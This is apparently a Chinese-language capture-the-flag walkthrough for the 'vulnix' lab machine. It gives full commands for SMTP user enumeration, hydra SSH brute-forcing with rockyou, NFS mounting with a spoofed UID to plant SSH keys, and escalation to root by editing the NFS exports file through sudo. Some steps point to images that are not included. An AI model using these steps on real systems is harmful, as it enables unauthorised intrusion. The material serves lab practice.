vulnix
扫描
nmap -sV -A -p- 10.4.7.135
nc -nv 10.4.7.135 25
nmap -p25 --script smtp-commands 10.4.7.135
VRFY vulnix
VRFY vulnixs
为什么使用这些命令,可以在hacktricks上查阅
25/open smtp
smtp-user-enum -M VRFY -U {Big_Userlist} -t {IP}
smtp-user-enum -M VRFY -U /usr/share/metasploit-framework/data/wordlists/unix_users.txt -t 10.4.7.135
这里感觉可能有用的也就user和root
渗透
由于没有web和其它线索,先试试爆破这两个用户
hydra -l root -P /usr/share/wordlists/rockyou.txt ssh://10.4.7.135 -V -f -t 50
hydra -l user -P /usr/share/wordlists/rockyou.txt ssh://10.4.7.135 -V -f -t 50
得到user
的密码为letmein
ssh登陆后查看权限信息
随后查看passwd文件,以及尝试sudo和find提权发现不行
根据hacktricks的使用方法说明使用2049端口的挂载
mount -t nfs [-o vers=2] :<remote_folder> <local_folder> -o nolock
mkdir /tmp/hfs
mount -t nfs 10.4.7.135:/home/vulnix /tmp/hfs -o nolock
cd /tmp/hfs
useradd vulnix -u 2008
passwd vulnix 123
su vulnix
cd /tmp/hfs
上面查看passwd文件发现vulnix用户的uid和gid都是2008
于是在kali中创建vulnix用户,uid设置为2008
在此目录下创建.ssh目录并进入
mkdir .ssh
cd .ssh
随后kali进入/tmp创建密钥
cd /tmp
ssh-keygen #过程使用enter
然后root下查看密钥
cat /root/.ssh/id_rsa.pub
切换到vulnix,将该密钥写入到vulnix /tmp/hfs/.ssh的一个新文件中,并且将文件命名为 authorized_keys
随后切换为root用户下,将id_rsa文件赋权
chmod +600 id_rsa
ssh连接用户
ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa vulnix@10.4.7.135
提权
使用sudo -l
发现可以以root权限编辑exports文件
将内容改为如图
随后保存退出
此时需要将靶机重启
再次查看发现添加成功
重启kali,在tmp下新建文件夹nfs1,用来挂载root
mkdir nfs1
mount -t nfs 10.4.7.135:/root /tmp/nfs1
root在tmp下创建 .ssh 目录
┌──(root㉿kali)-[/tmp]
└─# mkdir .ssh
在 .ssh目录下生成密钥
┌──(root㉿kali)-[/tmp/.ssh]
└─# ssh-keygen
将kali的密钥文件复制进新建的该文件夹下
如图进行操作将公钥写入挂载文件夹
tmp下.ssh私钥赋权
随后使用该命令连接
ssh -o 'PubkeyAcceptedKeyTypes +ssh-rsa' -i id_rsa root@10.4.7.135
随后登录成功成功提权
tmp下.ssh私钥赋权